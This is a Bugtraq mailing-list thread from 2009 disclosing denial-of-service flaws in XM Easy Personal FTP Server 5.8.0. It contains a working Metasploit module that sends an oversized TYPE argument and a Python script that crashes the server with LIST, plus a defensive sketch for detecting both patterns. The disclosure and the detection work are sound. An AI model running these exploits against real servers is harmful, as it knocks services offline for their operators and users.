Bugtraq mailing list archives
Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
From: Protek Research Lab <protekresearchlab () yahoo ca>
Date: Tue, 10 Nov 2009 13:37:54 -0800 (PST)
Hi,

It seems to have many more bugs than what you listed in your advisory. It's possible to DoS the server with these 3 other commands:

HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)

Here is an auxiliary module for metasploit...

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
      'Description'    => %q{
        You need a valid login to DoS this FTP server, but even anonymous can do it
        as long as it has permission to call Type.
      },
      'Author'         => 'Francis Provencher, Protek Research Lab',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 1 $',
      'References'     => [ [ 'URL', 'http://protekresearch.blogspot.com' ] ],
      'DisclosureDate' => '2009/11/10'))

    # They're required
    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
    ])
  end

  def run
    # Log in first; the TYPE command is only accepted after authentication
    return unless connect_login

    # Send TYPE with a 90000-byte argument
    raw_send_recv("TYPE #{'A' * 90000}\r\n")
    disconnect

    print_status("OK, server may still be technically listening, but it won't respond")
  end
end

Have a nice day!

--- On Tue, 11/10/09, zhangmc () mail ustc edu cn <zhangmc () mail ustc edu cn> wrote:
From: zhangmc () mail ustc edu cn <zhangmc () mail ustc edu cn>
Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
To: bugtraq () securityfocus com
Received: Tuesday, November 10, 2009, 3:07 AM

Date of Discovery: 10-Nov-2009
Credits: zhangmc[at]mail.ustc.edu.cn
Vendor: Dxmsoft
Affected: XM Easy Personal FTP Server 5.8.0
          Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. A denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when "LIST" is sent to the FTP server if you do not use "PASV" or "POST" first.

Details:
XM Easy Personal FTP Server can't handle the "LIST" command if you do not use "PASV" or "POST" first. If you have logged on to the server successfully, a "LIST" command will lead the FTP server to crash.

Severity: High

Exploit example:

#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")

if len(sys.argv) != 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except socket.error:
    print ("Connection error!")
    sys.exit(1)

# Read the banner, log in, then send LIST with no data connection set up
r=sock.recv(1024)
sock.send(("user %s\r\n" %username).encode())
r=sock.recv(1024)
sock.send(("pass %s\r\n" %passwd).encode())
r=sock.recv(1024)
sock.send(b"LIST\r\n")
sock.close()
sys.exit(0)
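A detection-side sketch for the two patterns reported in this thread (a directory-listing command sent with no data connection set up, and commands carrying a very long argument), run over FTP control-channel command lines. This is an added example, not code from either poster; the function name, the 512-byte limit and the sample sessions are assumptions made for illustration, and the setup verbs are the standard PASV/PORT/EPSV/EPRT commands.

```python
# Added example: audit FTP control-channel commands for the patterns in this thread.
MAX_CMD_LEN = 512  # assumption: local policy limit, not an RFC or vendor value
DATA_SETUP = {"PASV", "PORT", "EPSV", "EPRT"}  # commands that set up a data connection
DATA_USERS = {"LIST", "NLST"}                  # listing commands that need one


def audit_session(commands, max_len=MAX_CMD_LEN):
    """Return (index, verb, rule) findings for one FTP control session.

    commands: client command lines in order, as bytes, without the trailing CRLF.
    """
    findings = []
    data_ready = False
    for i, raw in enumerate(commands):
        verb = raw.partition(b" ")[0][:8].decode("ascii", "replace").upper()
        if len(raw) > max_len:
            findings.append((i, verb, "oversized-command"))
            continue  # an oversized line must not change the tracked session state
        if verb in DATA_SETUP:
            data_ready = True
        elif verb in DATA_USERS:
            if not data_ready:
                findings.append((i, verb, "data-command-without-setup"))
            # Simplification: require a fresh setup command before each listing.
            data_ready = False
    return findings


# Constructed sample sessions (not captured traffic).
NORMAL = [b"USER anonymous", b"PASS anonymous", b"TYPE I", b"PASV", b"LIST"]
BARE_LIST = [b"USER anonymous", b"PASS anonymous", b"LIST"]
LONG_ARG = [b"USER anonymous", b"PASS anonymous", b"TYPE " + b"A" * 90000]

if __name__ == "__main__":
    for name, session in (("normal", NORMAL),
                          ("bare LIST", BARE_LIST),
                          ("long argument", LONG_ARG)):
        print(name, audit_session(session))
```

The same two rules can be enforced inline by an FTP-aware proxy or expressed as IDS signatures; the length limit should be tuned to the longest legitimate path the server is expected to handle.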
Current thread:
- XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability zhangmc (Nov 10)
- Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability Protek Research Lab (Nov 12)